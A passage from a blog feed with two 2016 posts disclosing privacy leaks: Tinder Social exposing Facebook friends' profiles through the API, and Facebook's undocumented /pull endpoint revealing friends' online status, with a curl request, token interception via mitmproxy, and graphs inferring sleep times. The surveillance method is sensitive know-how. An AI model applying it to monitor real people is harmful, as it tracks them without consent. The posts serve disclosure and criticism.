user id>","badges":[],"bio":"i dont get it is this app like twitter"
","birth_date":"1987-07-[redacted]","gender":0,"name":"[redacted]",
"ping_time":"[utc one second resolution timezoned timestamp]
</code></pre></div></div>
<p><em>I think that you don’t want to expose that information about my Facebook</em>
<em>friends to me.</em></p>
<p><em>If this behaviour is intentional:</em>
<em>Sure, it’s your app.</em>
<em>Please reply to this ticket letting me know.</em></p>
<p><em>If this behaviour is not intentional:</em>
<em>You should change it!</em>
_I recommend not having profile information available at /user/<id>, or_
_limiting it only to users that have been suggested to me._</id></p>
<p><em>Please reply promptly if you’d like me to keep this secret, since because I</em>
<em>think you think this is a feature not a bug, I’ll probably blog about it</em>
<em>publicly soon.</em></p>
<p><em>Thanks for reading this!</em></p>
<p>And here’s the reply I got (within 48 hours, nice!):</p>
<p><em>>Hello,</em></p>
<p><em>>Thanks for bringing your concern to our attention. This is a part of our</em>
<em>feature called Tinder Social. You may opt out of Tinder Social at anytime by</em>
<em>visiting your Settings. If you opt out, you will not appear on your friends’</em>
<em>lists.</em></p>
<p><em>>To learn more about Tinder Social, please read our blog post here:</em>
<em>http://blog.gotinder.com/introducing-tinder-social/.</em></p>
<p>Props to the Tinder Security Team for responding so quickly. Also, sorry about
the barely coherent bug report, it was pretty late by the time I wrote this</p>
<p>Anyway, since this thing is a feature, not a bug, I can blog about it in good
conscience. Right?</p>
<hr />
<p>Great, I thought so too. That’s why I also wrote a tool that finds the Tinder
information about your Facebook friends for you. <a href="https://github.com/defaultnamehere/tinder-detective">Here it
is.</a> Before you use it
you’ll have to type “y” to a prompt that asks you if you really want to stalk
your real-life Facebook friends. You also need to supply your Facebook
authentication Token, which you can get by intercepting your Tinder app’s
traffic with mitmproxy. Or there might be another way. Or you could just go
talk to them, I’m sure they’re nice.</p>
<h2 id="live-demo">Live demo</h2>
<p>Wow here we go I hope this works fingers crossed hahaha</p>
<p><img src="/img/2016-07-21-stalking-your-facebook-friends-on-
tinder/a1d7422dfc2e333e878591a2c2243692dcfca27c737d1aacacbcfc4d24c580be.png" alt="image" /></p>
<p><em>Phew</em> it worked. That’s a screenshot of the 99% UX-free “webapp” I made to
display the Tinder profiles of your friends (with most of the information
faked in this picture). This page contains profiles for all your Facebook
friends that also have Tinder accounts. You can see information about them,
like their bio and the last time they used Tinder. You can also click the
buttons to long-range-sniper-noscope swipe left or right on them, even if they
haven’t shown up in the stream of people Tinder points at you.</p>
<p>Don’t actually use this by the way. Oh, no. That would be <em>creepy</em>. You
wouldn’t do that. Would you?</p>
<h2 id="so-is-this-even-a-big-deal">So is this even a big deal?</h2>
<p>Not for everyone, thankfully. But for some Tinder users, yeah it is. The main
idea is that there’s a subset of Tinder users that would rush to go and change
their profile if they found out their friends could see it.</p>
<p>Here’s what Tinder had to say about being able to find your friends on their
blog post announcing Tinder Social:</p>
<p><em>UPDATE: Any user who would prefer not to be added to groups can opt out of
Tinder Social through his/her settings to no longer appear on their friends’
lists. We are only testing it at this point, <strong>but it’s important to note
Tinder’s not a secret considering 70% of users download Tinder because their
friends recommend it.</strong></em></p>
<p>Yyyyyyeah I don’t really buy this reasoning, so I used it as the slogan of my
stalking program.</p>
<p>This is a bit like saying your Facebook Messenger chat history isn’t a secret
considering 70% of your friends recommend that you stop trying to SMS them
gifs.</p>
<p>For an app about relationships, which are generally the cause of drama and
tragedy in most storylines since the beginning of time, suddenly exposing
<em>more</em> personal information than before seems like it could lead to immediate
and lasting #regrets.</p>
<p>Basically here’s the deal. Some Tinder users put what I’m going to call
“sensitive information” in their Tinder profiles. If, suddenly, Tinder goes
from “only people Tinder suggests me to can see this” to “People I know in
real life can also see this and also swipe me”, I can imagine some people
feeling exposed.</p>
<p>Here are some extremely sensationalist examples of Bad Times that could
happen:</p>
<ul>
<li>You see that your monogamous cousin’s boyfriend is using Tinder right now</li>
<li>
<p>You see that <em>your</em> partner is using Tinder right now</p>
</li>
<li>
<p>Your friend’s using Tinder for dating but their Dad is a Mormon minister so they don’t want anyone to know</p>
</li>
<li>Your Facebook friend sees your Tinder bio and judges you, being all like “oh, I didn’t know <em>you</em> were into <em>that”</em></li>
<li>Some bozo makes graphs of when their Facebook friends are using Tinder and publishes them</li>
</ul>
<p>Those are all pretty worst-case, but they could happen. And I don’t want that!</p>
<p>I’m writing this blog post so you know that people can do this on Tinder, and
hey, maybe to encourage the folks at Tinder to reconsider deploying Tinder
Social to the rest of the world. (UPDATE: lol too late)</p>
<p>Okay, and I’m also still a little <em>salty</em> about the “idk just try it out in
uhhh idk, Australia” thing.</p>
<h2 id="tldr">tl;dr</h2>
<p><em>In summary:</em></p>
<ul>
<li><em>Tinder Social means your Facebook friends can see your Tinder user id</em></li>
<li><em>Using the Tinder API, your friends can use your user id to both swipe you and see your Tinder photos, bio, and the last time you were online.</em></li>
<li><em>Whoaaa</em></li>
</ul>
<h2 id="hey-wasnt-your-last-blog-post-also-about-stalking-your-friends">Hey wasn’t your last blog post also about stalking your friends?</h2>
<p>Heh yeah, two blogs in a row on stalking your friends, no biggie y’know haha.
They’re my ONLY two blogs actually ahahahahahahahahahahahahahahahahhahaha so
<em>funny</em> anyway I have to go I’m go̕i̗nǵ thrͩou͎g̼h a̰ͩ͂ tunn̅̾ėlͧ́
ȓ̸̜͊i͂g͡h͒t̶̛̟͂́͟ ̴͛̕͜n̬̾o̒̿͠w</p>
<hr />
<p><em>UPDATE: Plot twist, Tinder launched Tinder Social in the US the same day as
this blog post was published! According to their<a href="http://blog.gotinder.com/launching-tinder-social-a-new-way-to-plan-your-
night/"> blog
post</a> “You have to unlock Tinder Social in order to use it. Once you do,
you’ll see your friends who’ve also unlocked it (and they’ll see you).” I ran
Tinder Detective just now to see if what I did still works, and it does. This
could be because I’m in Australia and everyone in Australia has Tinder Social
“unlocked”. Or it could be that the APIs I’m using work regardless of whether
Tinder Social is “unlocked”. If you’re in America and you feel like testing
out whether the tool I wrote works there too, <a href="https://twitter.com/_notlikethis">tweet
me</a>.<br />
UPDATE 2: Thanks to some kind Americans on Twitter, we now know that you can
only stalk the Tinder profiles of your Facebook friends that have opted in to
Tinder Social. Unless you live in Australia. In which case you’re visible by
default. That’s what you get for being in staging, I guess.</em></p>
<hr />
<p><em>Jumbo-size extra crispy shoutouts to top humans
<a href="http://smerity.com/">Smerity</a> and <a href="https://blaker.space/">Blake</a> for their
sagely review of this blog post, and just generally for stopping me from
writing too many dumb things <3 <3</em></p>
<p><em>If you want to talk to me about this blog post then I dunno <a href="https://twitter.com/_mangopdf">hit me up on the tweet zone</a> I guess.</em></p>mangopdfHow I found a way to see the Tinder profiles of your Facebook friends. I told Tinder about this and they said "it's a feature lmao". Hacker News commentsGraphing when your Facebook friends are awake2016-02-15T05:02:38+00:002016-02-15T05:02:38+00:00/graphing-when-your-facebook-friends-are-awake<p>Look I’m not really sure why but I think I made a thing that makes graphs of
when people are online on <a href="http://gabegaming.com">Facebook</a>. It sounds kinda
creepy and uh it is. Read along so you, too, can be the NSA. ˙ ͜ʟ˙</p>
<hr />
<p><img src="/img/2016-02-15-graphing-when-your-facebook-friends-are-
awake/c40272b2c7c3b9e438ef7c664d7885e84a11d339e5ba4592bcd8439c2a4f1b46.png" alt="image" /></p>
<hr />
<h2 id="little-green-dots">Little green dots</h2>
<p>You know those green dots on the sidebar on <a href="http://gabegaming.com">Facebook
</a>that tell you who’s online? How do they get there?
Also there are times next to people who are offline. What are those about?</p>
<p><img src="/img/2016-02-15-graphing-when-your-facebook-friends-are-
awake/551460a51d27e9ae89bf41324681e3003a79b8dae07b416222269958379bb02f.png" alt="image" /></p>
<p>I was wondering the same things, and so one day I decided to 360 noscope hack
<a href="http://niceme.me">Facebook </a>by right clicking and selecting “Inspect
Element”.</p>
<p><img src="/img/2016-02-15-graphing-when-your-facebook-friends-are-
awake/9348aaaf747682858cf914ce9303b06d6c25ef31e0287e4b108c39d0be894838.png" alt="image" /></p>
<h2 id="im-in"><em>I’M <strong>IN</strong></em></h2>
<p>We did it team. Anyway alright uhhhh let’s just uh snoop around here
<em>reallllll sneaky like</em></p>
<p><img src="/img/2016-02-15-graphing-when-your-facebook-friends-are-
awake/c8e33edf107c714f4a23857a0a0355a411e9063527c52851eda8409c824fa482.png" alt="image" /></p>
<p>If you reload the page you’ll see approximately fifty-bajillion network
requests go off as <a href="http://www.thinkb4uclick.ie/">Facebook</a> desperately tries
to load all the junk that it needs to display
<a href="https://www.youtube.com/watch?v=dQw4w9WgXcQ">facebook.com</a>.</p>
<p>You might be wondering at this point why I decided to look for interesting
things in this mess instead of, I dunno, getting out more, getting a cat, that
sorta thing. Anyway hey look a heading</p>
<h2 id="finding-the-good-stuff">Finding the good stuff</h2>
<p><img src="/img/2016-02-15-graphing-when-your-facebook-friends-are-
awake/85cd30d6d53e78a721b13adbf3bb71cbf2aeb93ab33782deba57b288cdcfb69e.png" alt="image" /></p>
<p>What’s this “pull” thing?</p>
<p><img src="/img/2016-02-15-graphing-when-your-facebook-friends-are-
awake/ffd837d89fc05b9cc94418bb6fc69293cfd09a0d6b59100cdb3d83f11fc23844.png" alt="image" /></p>
<p>THAT looks like some #datascience right there. This is the kind of <strong>100%
legit secret undocumented “API”</strong> that we came here for. Let’s do some
reverse-engineering.</p>
<p>It looks like a mapping of <a href="http://gabegaming.com">Facebook </a>user ids to…
their online status? But there’s more than one value? “webStatus” and
“fbAppStatus” are both there. What’s more, it tells you what the person is
<em>doing</em> on each of the different kinds of statuses.</p>
<p>For example:</p>
<ul>
<li>“messengerStatus”: “invisible” means they’re not online on the Facebook Messenger app.</li>
<li>“webStatus”: “idle” means their web browser is logged in to <a href="http://oneu.se">Facebook</a>, and has the page open, but they aren’t doing anything on the site like moving their mouse or talking to anyone.</li>
<li>Since we have both of these <em>at the same time</em>, we can tell that this person is likely not using their phone, and that they were using <a href="http://www.logobird.com/wp-content/uploads/2011/04/facebook-procrastination.jpg">facebook.com</a> recently, but not right now.</li>
</ul>
<p>That’s already a little creepy that we can tell that about people. But can we
do more with this?</p>
<p>You might also notice that there is a value called “la” that is a big integer
that starts with “14″. If you I dunno, didn’t have a lot of friends in high
school, you might recognise that as a <a href="https://en.wikipedia.org/wiki/Unix_time">UNIX time
stamp</a> - the time in seconds since
midnight, January 1, 1970.</p>
<p>Computer Scientists thought this would be a good time to start measuring the
time from because the first app was born at midnight, January 1, 1970. The app
was a custom emoji pack for an ancient model of phone that would one day
evolve to become the first Blackberry.</p>
<p>If you’re wondering why the response starts with “for (;;);”, it’s to, among
other things, <a href="http://stackoverflow.com/a/7099820">encourage developers to use a quality JSON
decode</a>r, instead of like, y’know, eval().</p>
<p>Anyway that “la” thing stands for “last active”, and tells you the last time
the person was active on <a href="http://nsa.gov/careers">Facebook</a>, down to the
<em>second</em>. Do you see where I’m going with this?</p>
<h2 id="roleplaying-as-the-nsa-͜ʟ">Roleplaying as the NSA ˙ ͜ʟ˙</h2>
<p>So far we have a whole bunch of things which look like this</p>
<ul>
<li>A person</li>
<li>A time</li>
<li>Whether they’re <strong>online</strong> or <strong>offline</strong> or <strong>idle</strong></li>
<li>Which devices they’re online/offline/idle on</li>
</ul>
<p>This doesn’t seem that interesting at first, since you already know who is
online by looking at the sidebar. But <strong>what if there was someone <em>always</em>
watching the little green dots?</strong></p>
<p>Using the <em>power of computers</em>, you can just write a Python program to listen
to what the /pull requests are saying <em>all the time ever</em>, and write it down.</p>
<p>Here’s a screenshot of all the log files I’ve got:</p>
<p><img src="/img/2016-02-15-graphing-when-your-facebook-friends-are-
awake/c1230c0b60926fd16c20aa323e114e4f144cb9597a633c946423c3080ff95b74.png" alt="image" /></p>
<p>And here’s what an individual log file looks like (the first 10 lines):</p>
<p><img src="/img/2016-02-15-graphing-when-your-facebook-friends-are-
awake/85a7a3e40a761f8752bf2517b2c4b79d2c7ebef59254aa5dad80f45e9891fb66.png" alt="image" /></p>
<p>Those blurred out things are <a href="https://facebook.com/">Facebook</a> user ids. If
you think these screenshots look <em>a little bit creepy</em> then YEAH I KNOW RIGHT.</p>
<h2 id="tell-me-about-your-program-then-you-massive-nerd">Tell me about your program then you massive nerd</h2>
<p>It runs 24/7, and it’s constantly logging online/offline activity data from
those /pull URLs using my <a href="http://html9responsiveboilerstrapjs.com/">Facebook
</a>cookie.</p>
<p>Writing it was <em>mostly</em> about saying “jeez, all these parameters look
<em>complicated</em>” and then blindly copy/pasting them anyway.</p>
<p><img src="/img/2016-02-15-graphing-when-your-facebook-friends-are-
awake/c1c9830d821b384cb2ec97d9bebbd908f45d48ea3e5d8f7b6fc889f506f8e4c3.png" alt="image" /></p>
<p>Protip, you can right click on any network request in Chrome’s Developer Tools
and click “Copy as cURL”. This is <em>amazing</em> and lets you re-run a request from
the terminal, as well as give you all the headers and cookies used to run that
request in a nice copy-pasteable format.</p>
<p>The first step was to just run that request verbatim in a terminal with curl.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>> curl 'https://1-edge-
chat.facebook.com/pull?channel=p_[redacted]&amp;seq=3&amp;partition=-2&amp;clientid=[redacted]&amp;cb=6dcn&amp;idle=5&amp;qp=y&amp;cap=8&amp;tur=1545&amp;qpmade=1455427171900&amp;pws=fresh&amp;isq=221841&amp;msgs_recv=3&amp;uid=[redacted]&amp;viewer_uid=[redacted]&amp;sticky_token=239&amp;sticky_pool
=atn2c06_chat-proxy&amp;state=active' -H 'origin: https://www.facebook.com' -H
'dnt: 1' -H 'accept-encoding: gzip, deflate, sdch' -H 'accept-language: en-
US,en;q=0.8,en-AU;q=0.6' -H 'user-agent: ‘[redacted]' -H 'accept: */*' -H
'referer: https://www.facebook.com/' -H 'authority: 1-edge-chat.facebook.com'
-H 'cookie: ‘[redacted]' --compressed
</code></pre></div></div>
<p>I was expecting it to not work because it looks like it has some sequence
numbers in it oh boy BUT it turned out to just take a really long time. I
later found out this was because the /pull endpoint is using <a href="https://en.wikipedia.org/wiki/Push_technology">HTTP Long
Polling</a>, which turns out to be
like a streaming HTTP GET request.</p>
<p>The only other important parameter to worry about is “seq”, which I’m guessing
is the sequence number of the response from Facebook. Just add 1 to the
sequence number that the response from /pull gives for the next request and
you’re good to go.</p>
<p>If you’re worrying about remembering all this, chill out I got yo’ back, my
100% <a href="https://www.facebook.com/terms">Terms of Service Compliant</a>
implementation of this is available <a href="https://github.com/defaultnamehere/zzzzz">here on
GitHub</a>. Standard disclaimers of
“I’m so sorry I wrote parts of this in like 30 minutes” apply.</p>
<p>One caveat of the data-collection program that I’ve noticed is that it has
false negatives. That is, sometimes it won’t give you a “this person is
online” data point, even though they really are online. I guess that gives
plausible deniability of… being offline?</p>
<h2 id="you-should-probably-get-out-more">You should probably get out more</h2>
<p>[worried laughter]</p>
<h2 id="so-thats-the-hard-part-done-right">So that’s the hard part done, right?</h2>
<p><strong>Let me paint you a word-picture</strong>. It’s 11pm, I’m listening to <a href="https://www.youtube.com/watch?v=1Ua2gabdJoc">the soundtrack to The Social Network</a> (ironically? meta-ironically? I don’t even know), I have six terminals tiled across two screens as well as fifty thousand browser tabs open and I’m up to my <em><strong>third</strong> graphing library</em>.</p>
<p>Making graphs is really hard.</p>
<p>I used <a href="http://matplotlib.org/">matplotlib</a>, but I realised this wasn’t my
thesis and I wouldn’t be embedding this ugly graph as a pdf into a LaTeX
document that takes 3 passes of pdflatex to render because there’s been a
terrible but extremely localised accident where only humanity’s LaTeX to pdf
converters have been irreversibly sent back in time to the 80s.</p>
<p>I used <a href="bokeh.pydata.org/">bokeh</a>, which claims to be a “matplotlib-killer”,
and it was was okay until <a href="http://blakeapproves.com">a friend</a> told me “it
isn’t the 90s anymore, you don’t generate graphs server-side. Also your graphs
are ugly and you should feel ugly <strong>you utter fraud</strong>”.</p>
<p><a href="http://blaker.space">This friend</a> recommended <a href="nvd3.org/">nvd3.js</a>,
presumably because you’re not making <em>real</em> graphs in 2016 unless your
graphing library is <something>.js and requires at LEAST one other
<something else>.js as a dependency. Everyone looks at you like “<strong>what,
you DON’T already use <something else>.js?</strong> Jeez say goodbye to your
Hacker News karma. Just apt-get install npm && npm install bower
&& bower install-” NO STOP IT THIS ISN’T WHAT <a href="https://en.wikipedia.org/wiki/Tim_Berners-Lee">TIM BERNERS-
LEE</a> WANTED”.</p>
<p>I think it took about three times as much time to graph the data as it took to
write the code to download it. And <strong>the graphs aren’t even good</strong>! I gave up
on perfecting the graphs so I could just hurry up and write this questionable
blog post already. Just think of me resolving pip3 dependencies when you see
the ugly graphs.</p>
<p>(°ロ°)☝ <strong>AND ANOTHER THING</strong> when it’s midnight and your x-axis formatting
function doesn’t convert UNIX times into JavaScript date objects properly
because there’s no timezone information and I dunno JavaScript was written by
some guy in two weeks (yeah I ain’t afraid to call it out what of it) and your
binary-search based conversion of sparse timeseries data into uniformly dense
timeseries data is causing <em>so many data points</em> to be graphed that it’s
slowly crashing Chrome and you’re watching <em>helplessly</em> as your RAM goes up
and Chrome won’t close the tab and it just <em>doesn’t seem right</em> that 2016, the
year of the Linux Desktop has brought us this situation I mean I thought if
you had enough <something>.js libraries this stuff was meant to just <em>scale right up</em> so tha-</p>
<h2 id="quit-stalling-with-graphing-libraries-and-show-me-the-graphs">Quit stalling with graphing libraries and show me the graphs</h2>
<p>Fine but you’re missing out on top-quality graphing-related banter.</p>
<hr />
<p><em>The graphs in this section are all of the online/offline activity of some of
my Facebook friends.They consented to it being on this blog post on the
condition that it’s anonymous.</em></p>
<hr />
<h2 id="person-1">Person 1</h2>
<p><img src="/img/2016-02-15-graphing-when-your-facebook-friends-are-
awake/48fe7be2ca53245ed9d96e7ccfe7449ed6a3d36a0efda7c2f37e1701b14db7ac.png" alt="image" /></p>
<p>Here’s someone’s graph. The x-axis is time, and the y-axis is how online the
user is. Possible states for someone’s status are “offline”, “invisible”,
“idle”, and “active”. Each coloured line is a different kind of <em>client. _It’s
called a _client</em> because I don’t know I’m an Information Visualisation
<em>Professional</em> and I get to make up words like that. Here are explanations for
what each of the <em>“coloured lines”</em> means:</p>
<ul>
<li><strong>status</strong> - Not sure what this is. Some kind of client-agnostic status? It doesn’t line up exactly with the activity of the other clients though</li>
<li><strong>webStatus</strong> - Chat activity on facebook.com</li>
<li><strong>messengerStatus</strong> - Status on the Messenger mobile app</li>
<li><strong>fbAppStatus</strong> - Status on the Facebook mobile app</li>
<li><strong>otherStatus</strong> - Presumably shows when people are online on other apps that can access the API that causes them to be considered “online”. OAuth? Random “apps” like Farmville? No idea</li>
</ul>
<p>Here’s the same graph, with some clumsy drawings on it showing when I think
this person is awake/asleep.</p>
<p><img src="/img/2016-02-15-graphing-when-your-facebook-friends-are-
awake/07d0873f21529f89f9c56f429820d4185d33af87f3f503dd6a46e4f70e235856.png" alt="image" /></p>
<p>You can see the amount of rest they’re getting each day - it’s the width of
the “asleep” bit.</p>
<p>You can also see that they were probably asleep from 3am to 10am on February
11, and BOY does it feel creepy writing this.</p>
<p>Of course, this isn’t perfect, since they might be awake and <em>not</em> using
Facebook (I know). Having spoken to a few people who were graphed, it’s been a
fairly accurate measure of awake/asleep time, as well as “how much do you
browse Facebook at work” time ;)</p>
<p>Do you look at Facebook shortly after you wake up? Shortly before you sleep?
If so, these graphs are a fairly accurate way to measure when you were asleep,
and anyone you’re friends with on Facebook can do it.</p>
<h2 id="person-2">Person 2</h2>
<p><img src="/img/2016-02-15-graphing-when-your-facebook-friends-are-
awake/6cad6465fc3202a5a1875c692a071b54d1d8672ea2ddad4c45ff4c9303779177.png" alt="image" /></p>
<p>I showed this person their graph and asked them some questions.</p>
<blockquote>
<p>“Did you go to sleep around 11:10pm last night?”<br />
They said yes.</p>
</blockquote>
<blockquote>
</blockquote>
<blockquote>
<p>“Did you wake up around 8:32? That’s a weird time. Was your alarm set for
8:30?”<br />
They said yes.</p>
</blockquote>
<p>NSA APPROVED ✔️ 🆗👌👌 👍✔️👌🆗🆗👍</p>
<h2 id="person-3">Person 3</h2>
<p><img src="/img/2016-02-15-graphing-when-your-facebook-friends-are-
awake/db07774710fbb3a457d4aa90aef1e846459649a71a44672cbee4bf9648d7c104.png" alt="image" /></p>
<p>There are two interesting things about this graph</p>
<ul>
<li>
<p>The person isn’t online as frequently as the previous examples</p>
</li>
<li>
<p>The person isn’t using the Messenger app nearly as much</p>
</li>
</ul>
<p>You can see that their webStatus was “online” on and off from midnight til
around 2am, and then again at 10:21am.. I’m not sure if this spiky pattern
means that they really were online, then offline, then online again, or if
it’s just a quirk of the dodgy undocumented “API” I’m using, or even if it’s
just a problem with my code.</p>
<p>Similarly, I’m not sure why there are these weird spikes every three minutes
(+- ~1minute) sometimes.</p>
<p><img src="/img/2016-02-15-graphing-when-your-facebook-friends-are-
awake/88e8b53a88b5706494f6d5d66859087f64b8c68559c1e5e6548a863d2797f726.png" alt="image" /></p>
<p>Also, why does “otherStatus” go to offline precisely when “webStatus” goes to
online? So many questions! Let me know if you know the answers to any of these
things (@Facebook employee friends ;) ;) ;))</p>
<hr />
<p>Anyway, I hope I’ve convinced you that this is real creepy. I don’t really
want to be able to have the power to do this.</p>
<h2 id="your-dumb-graph-screenshots-are-too-small-give-me-a-live-graph-to-play-with">Your dumb graph screenshots are too small. Give me a live graph to play with</h2>
<p><a href="https://cdn.rawgit.com/defaultnamehere/zzzzz/70d407736092304ee247fbbacbe9f82bc0cba472/templates/sample_graph.html">You got it, boss. Click here. Or anywhere, really. This whole sentence is a
link.</a></p>
<h2 id="what-else-can-you-do-with-this-data">What else can you do with this data?</h2>
<p>You can aggregate. Finding the average wake up time/sleep time/time spent on
Facebook each day and then looking for outliers sure sounds like a way to find
interesting things about your Facebook friends.</p>
<p>You can write a thing to email you every morning with the names and sleep
times of everyone who’s had less than 6 hours of sleep.</p>
<p>You could even try and guess when your friends are talking to each other, by
looking for times when only a few people are active, although I suspect this
would be hard.</p>
<p>I’m sure you can come up with something else, too.</p>
<h2 id="why-can-you-do-this-cant-facebook-stop-this-from-happening">Why can you do this? Can’t Facebook stop this from happening?</h2>
<p>That’s a good question, thanks for asking.</p>
<p>It makes sense for <a href="nicememe.website">Facebook </a>to be able to do this, since
they can tell when everyone is online anyway. But why can your <a href="https://matmartinez.net/nsfw/">Facebook
</a>friends do this to you?</p>
<p>I don’t know all the details of how facebook.com uses all the data that’s sent
via the /pull endpoint, but it’s kinda creepy that I can see my friends’
status on every device? I guess they could just give me “web” or “mobile” or
“offline”, rather than the full list of statuses for every client, but even
that doesn’t solve the problem.</p>
<p>I also see the value in seeing “last active 4h ago” and “last active 1m ago”
for Messenger contacts but… I dunno, here I am making these creepy graphs.</p>
<p>Anyway, I just open-sourced my dodgy graph making thing so now everyone can do
this. And who knows how many people have been doing it already?</p>
<p>I’m probably oversimplifying it, though. The smart people at <a href="https://myspace.com/">Facebook
</a>who write this stuff have probably thought of all of
this and found that this way was best.</p>
<h2 id="can-i-stop-you-from-doing-this-to-me">Can I stop you from doing this to me?</h2>
<p>Kinda. Coincidentally, because my script is always running, collecting data, I
show up as “online” all the time. If you were also running a script like this,
it would partially prevent what I’m doing from working on you, since you
always show up as “online”, no matter what you’re <em>really</em> doing. Activity
from the Messenger app will still show up separately, though.</p>
<h2 id="tldr">tl;dr</h2>
<ul>
<li>
<p><a href="https://pbs.twimg.com/media/CRRJVwIUwAAf-wP.png">Facebook </a>sends your computer a bunch of interesting information when you’re on <a href="https://pbs.twimg.com/media/CRRGTVcU8AA7veC.png:large">facebook.com</a>.</p>
</li>
<li>
<p>You can collect that information over time and use it to keep track of when people are on <a href="http://dudududu.de/">Facebook</a>, and which devices they’re using.</p>
</li>
<li>You can make a pretty good guess as to what time people are going to sleep and waking up</li>
<li>It’s creepy, but I don’t see a way for <a href="https://en.wikipedia.org/wiki/Phishing#Link_manipulation">Facebook </a>to stop allowing this while still making their chat app good.</li>
</ul>
<h2 id="so-how-does-this-make-money-again">So how does this make money again?</h2>
<p>Oh, no no no. I just uh don’t get out much.</p>
<hr />
<p><em>If you want to talk to me about this blog post then I dunno <a href="https://twitter.com/mangopdf">tweet at
me</a> I guess. You can also<a href="https://github.com/defaultnamehere/"> stalk me on
GitHub</a> if you want.</em></p>mangopdfI stumbled upon a dodgy Facebook API. Read for tips on how to apply at the NSA. Hacker News comments